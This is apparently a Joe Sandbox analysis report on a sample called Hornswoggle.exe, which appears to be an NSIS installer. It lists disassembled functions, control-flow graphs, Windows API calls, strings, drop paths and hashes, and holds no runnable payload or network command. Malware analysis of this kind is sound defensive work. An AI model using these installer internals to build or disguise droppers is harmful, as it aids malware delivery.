                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: Festremser Setup: Completed
                                                        • API String ID: 590372296-4016300305
                                                        • Opcode ID: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
                                                        • Instruction ID: 22ae5336f142fb48a9cf727d400d9a9d64ef180589f118636d3b9fd0a83d5397
                                                        • Opcode Fuzzy Hash: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
                                                        • Instruction Fuzzy Hash: 0FA147B1900208BFDB119FA0DD89EAE7BB9FB08355F00407AFA05B61A0C7B55E51DF69
                                                        Function 00405705 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 487 405705-40572b call 4059c3 490 405744-40574b 487->490 491 40572d-40573f DeleteFileA 487->491 493 40574d-40574f 490->493 494 40575e-40576e call 405e63 490->494 492 4058ce-4058d2 491->492 495 405755-405758 493->495 496 40587c-405881 493->496 500 405770-40577b lstrcatA 494->500 501 40577d-40577e call 40591c 494->501 495->494 495->496 496->492 499 405883-405886 496->499 502 405890-405898 call 406167 499->502 503 405888-40588e 499->503 505 405783-405786 500->505 501->505 502->492 510 40589a-4058ae call 4058d5 call 4056bd 502->510 503->492 508 405791-405797 lstrcatA 505->508 509 405788-40578f 505->509 511 40579c-4057ba lstrlenA FindFirstFileA 508->511 509->508 509->511 526 4058b0-4058b3 510->526 527 4058c6-4058c9 call 40507c 510->527 513 4057c0-4057d7 call 405900 511->513 514 405872-405876 511->514 520 4057e2-4057e5 513->520 521 4057d9-4057dd 513->521 514->496 516 405878 514->516 516->496 524 4057e7-4057ec 520->524 525 4057f8-405806 call 405e63 520->525 521->520 523 4057df 521->523 523->520 528 405851-405863 FindNextFileA 524->528 529 4057ee-4057f0 524->529 537 405808-405810 525->537 538 40581d-405828 call 4056bd 525->538 526->503 531 4058b5-4058c4 call 40507c call 405d1e 526->531 527->492 528->513 535 405869-40586c FindClose 528->535 529->525 533 4057f2-4057f6 529->533 531->492 533->525 533->528 535->514 537->528 540 405812-40581b call 405705 537->540 546 405849-40584c call 40507c 538->546 547 40582a-40582d 538->547 540->528 546->528 549 405841-405847 547->549 550 40582f-40583f call 40507c call 405d1e 547->550 549->528 550->528
                                                        APIs
                                                        • DeleteFileA.KERNELBASE(?,?,76003410,76002EE0,00000000), ref: 0040572E
                                                        • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,76003410,76002EE0,00000000), ref: 00405776
                                                        • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,76003410,76002EE0,00000000), ref: 00405797
                                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,76003410,76002EE0,00000000), ref: 0040579D
                                                        • FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,76003410,76002EE0,00000000), ref: 004057AE
                                                        • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
                                                        • FindClose.KERNEL32(00000000), ref: 0040586C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$8B$\*.*
                                                        • API String ID: 2035342205-557117294
                                                        • Opcode ID: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
                                                        • Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
                                                        • Opcode Fuzzy Hash: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
                                                        • Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA
                                                        Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 0040211D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls
                                                        • API String ID: 123533781-254672218
                                                        • Opcode ID: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                        • Instruction ID: 56974f308a9a67f015f648966d3a58154011754483a046e15126684feee28a9b
                                                        • Opcode Fuzzy Hash: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                        • Instruction Fuzzy Hash: 255138B5A00208BFCF10DFA4C988A9D7BB5FF48318F20856AF515EB2D1DB799941CB54
                                                        Function 004064AE Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                        • Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
                                                        • Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                        • Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44
                                                        Function 00406167 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(76003410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0), ref: 00406172
                                                        • FindClose.KERNEL32(00000000), ref: 0040617E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\
                                                        • API String ID: 2295610775-3404278061
                                                        • Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                        • Instruction ID: 121c98e09340d698ac486e65b2e2524f4cd38212b93dde10f2a633de382b9f18
                                                        • Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                        • Instruction Fuzzy Hash: 82D012319190207FC34117396C0C84B7A589F653317528B33F86AF52F0D3349CA286ED
                                                        Function 00403B75 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 403b75-403b87 178 403cc8-403cd7 177->178 179 403b8d-403b93 177->179 181 403d26-403d3b 178->181 182 403cd9-403d21 GetDlgItem * 2 call 404048 SetClassLongA call 40140b 178->182 179->178 180 403b99-403ba2 179->180 183 403ba4-403bb1 SetWindowPos 180->183 184 403bb7-403bba 180->184 186 403d7b-403d80 call 404094 181->186 187 403d3d-403d40 181->187 182->181 183->184 191 403bd4-403bda 184->191 192 403bbc-403bce ShowWindow 184->192 196 403d85-403da0 186->196 188 403d42-403d4d call 401389 187->188 189 403d73-403d75 187->189 188->189 210 403d4f-403d6e SendMessageA 188->210 189->186 195 404015 189->195 197 403bf6-403bf9 191->197 198 403bdc-403bf1 DestroyWindow 191->198 192->191 203 404017-40401e 195->203 201 403da2-403da4 call 40140b 196->201 202 403da9-403daf 196->202 206 403bfb-403c07 SetWindowLongA 197->206 207 403c0c-403c12 197->207 204 403ff2-403ff8 198->204 201->202 213 403fd3-403fec DestroyWindow KiUserCallbackDispatcher 202->213 214 403db5-403dc0 202->214 204->195 211 403ffa-404000 204->211 206->203 208 403cb5-403cc3 call 4040af 207->208 209 403c18-403c29 GetDlgItem 207->209 208->203 215 403c48-403c4b 209->215 216 403c2b-403c42 SendMessageA IsWindowEnabled 209->216 210->203 211->195 218 404002-40400b ShowWindow 211->218 213->204 214->213 219 403dc6-403e13 call 405e85 call 404048 * 3 GetDlgItem 214->219 220 403c50-403c53 215->220 221 403c4d-403c4e 215->221 216->195 216->215 218->195 247 403e15-403e1a 219->247 248 403e1d-403e59 ShowWindow KiUserCallbackDispatcher call 40406a EnableWindow 219->248 225 403c61-403c66 220->225 226 403c55-403c5b 220->226 224 403c7e-403c83 call 404021 221->224 224->208 228 403c9c-403caf SendMessageA 225->228 230 403c68-403c6e 225->230 226->228 229 403c5d-403c5f 226->229 228->208 229->224 234 403c70-403c76 call 40140b 230->234 235 403c85-403c8e call 40140b 230->235 245 403c7c 234->245 235->208 244 403c90-403c9a 235->244 244->245 245->224 247->248 251 403e5b-403e5c 248->251 252 403e5e 248->252 253 403e60-403e8e GetSystemMenu EnableMenuItem SendMessageA 251->253 252->253 254 403e90-403ea1 SendMessageA 253->254 255 403ea3 253->255 256 403ea9-403ee2 call 40407d call 405e63 lstrlenA call 405e85 SetWindowTextA call 401389 254->256 255->256 256->196 265 403ee8-403eea 256->265 265->196 266 403ef0-403ef4 265->266 267 403f13-403f27 DestroyWindow 266->267 268 403ef6-403efc 266->268 267->204 270 403f2d-403f5a CreateDialogParamA 267->270 268->195 269 403f02-403f08 268->269 269->196 271 403f0e 269->271 270->204 272 403f60-403fb7 call 404048 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 270->272 271->195 272->195 277 403fb9-403fcc ShowWindow call 404094 272->277 279 403fd1 277->279 279->204
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
                                                        • ShowWindow.USER32(?), ref: 00403BCE
                                                        • DestroyWindow.USER32 ref: 00403BE2
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
                                                        • GetDlgItem.USER32(?,?), ref: 00403C1F
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403C3A
                                                        • GetDlgItem.USER32(?,00000001), ref: 00403CE8
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403CF2
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
                                                        • GetDlgItem.USER32(?,00000003), ref: 00403E03
                                                        • ShowWindow.USER32(00000000,?), ref: 00403E24
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E36
                                                        • EnableWindow.USER32(?,?), ref: 00403E51
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
                                                        • EnableMenuItem.USER32(00000000), ref: 00403E6E
                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
                                                        • lstrlenA.KERNEL32(Festremser Setup: Completed,?,Festremser Setup: Completed,00422F20), ref: 00403EC2
                                                        • SetWindowTextA.USER32(?,Festremser Setup: Completed), ref: 00403ED1
                                                        • ShowWindow.USER32(?,0000000A), ref: 00404005
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID: Festremser Setup: Completed
                                                        • API String ID: 3282139019-4016300305
                                                        • Opcode ID: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
                                                        • Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
                                                        • Opcode Fuzzy Hash: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
                                                        • Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E
                                                        Function 004037E3 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 280 4037e3-4037fb call 4061fc 283 4037fd-40380d call 405dc1 280->283 284 40380f-403840 call 405d4a 280->284 291 403863-40388c call 403aa8 call 4059c3 283->291 289 403842-403853 call 405d4a 284->289 290 403858-40385e lstrcatA 284->290 289->290 290->291 298 403892-403897 291->298 299 403913-40391b call 4059c3 291->299 298->299 300 403899-4038bd call 405d4a 298->300 305 403929-40394e LoadImageA 299->305 306 40391d-403924 call 405e85 299->306 300->299 307 4038bf-4038c1 300->307 309 403950-403980 RegisterClassA 305->309 310 4039cf-4039d7 call 40140b 305->310 306->305 312 4038d2-4038de lstrlenA 307->312 313 4038c3-4038d0 call 405900 307->313 314 403986-4039ca SystemParametersInfoA CreateWindowExA 309->314 315 403a9e 309->315 321 4039e1-4039ec call 403aa8 310->321 322 4039d9-4039dc 310->322 319 4038e0-4038ee lstrcmpiA 312->319 320 403906-40390e call 4058d5 call 405e63 312->320 313->312 314->310 318 403aa0-403aa7 315->318 319->320 325 4038f0-4038fa GetFileAttributesA 319->325 320->299 333 4039f2-403a0c ShowWindow call 40618e 321->333 334 403a75-403a76 call 40514e 321->334 322->318 326 403900-403901 call 40591c 325->326 327 4038fc-4038fe 325->327 326->320 327->320 327->326 341 403a18-403a2a GetClassInfoA 333->341 342 403a0e-403a13 call 40618e 333->342 337 403a7b-403a7d 334->337 339 403a97-403a99 call 40140b 337->339 340 403a7f-403a85 337->340 339->315 340->322 343 403a8b-403a92 call 40140b 340->343 346 403a42-403a65 DialogBoxParamA call 40140b 341->346 347 403a2c-403a3c GetClassInfoA RegisterClassA 341->347 342->341 343->322 351 403a6a-403a73 call 403733 346->351 347->346 351->318
                                                        APIs
                                                          • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                          • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                        • lstrcatA.KERNEL32(1033,Festremser Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Festremser Setup: Completed,00000000,00000002,76003410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Hornswoggle.exe",00000000), ref: 0040385E
                                                        • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,1033,Festremser Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Festremser Setup: Completed,00000000,00000002,76003410), ref: 004038D3
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
                                                        • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038F1
                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises), ref: 0040393A
                                                          • Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE
                                                        • RegisterClassA.USER32(00422EC0), ref: 00403977
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
                                                        • ShowWindow.USER32(00000005,00000000), ref: 004039FA
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
                                                        • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
                                                        • RegisterClassA.USER32(00422EC0), ref: 00403A3C
                                                        • DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Control Panel\Desktop\ResourceLocale$Festremser Setup: Completed$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 1975747703-964347954
                                                        • Opcode ID: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
                                                        • Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
                                                        • Opcode Fuzzy Hash: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
                                                        • Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D
                                                        Function 00402CB6 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 354 402cb6-402d04 GetTickCount GetModuleFileNameA call 405ad6 357 402d10-402d3e call 405e63 call 40591c call 405e63 GetFileSize 354->357 358 402d06-402d0b 354->358 366 402d44-402d5b 357->366 367 402e2e-402e3c call 402c17 357->367 359 402f55-402f59 358->359 368 402d5d 366->368 369 402d5f-402d6c call 4031cd 366->369 374 402e42-402e45 367->374 375 402f0d-402f12 367->375 368->369 378 402d72-402d78 369->378 379 402ec9-402ed1 call 402c17 369->379 376 402e71-402ebd GlobalAlloc call 4062df call 405b05 CreateFileA 374->376 377 402e47-402e5f call 4031e3 call 4031cd 374->377 375->359 404 402ed3-402f03 call 4031e3 call 402f5c 376->404 405 402ebf-402ec4 376->405 377->375 402 402e65-402e6b 377->402 382 402df8-402dfc 378->382 383 402d7a-402d92 call 405a91 378->383 379->375 386 402e05-402e0b 382->386 387 402dfe-402e04 call 402c17 382->387 383->386 401 402d94-402d9b 383->401 393 402e0d-402e1b call 406271 386->393 394 402e1e-402e28 386->394 387->386 393->394 394->366 394->367 401->386 406 402d9d-402da4 401->406 402->375 402->376 413 402f08-402f0b 404->413 405->359 406->386 408 402da6-402dad 406->408 408->386 410 402daf-402db6 408->410 410->386 412 402db8-402dd8 410->412 412->375 414 402dde-402de2 412->414 413->375 417 402f14-402f25 413->417 415 402de4-402de8 414->415 416 402dea-402df2 414->416 415->367 415->416 416->386 418 402df4-402df6 416->418 419 402f27 417->419 420 402f2d-402f32 417->420 418->386 419->420 421 402f33-402f39 420->421 421->421 422 402f3b-402f53 call 405a91 421->422 422->359
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402CCA
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Hornswoggle.exe,00000400), ref: 00402CE6
                                                          • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
                                                          • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00402D2F
                                                        • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E76
                                                        Strings
                                                        • C:\Users\user\Desktop\Hornswoggle.exe, xrefs: 00402CD0, 00402CDF, 00402CF3, 00402D10
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
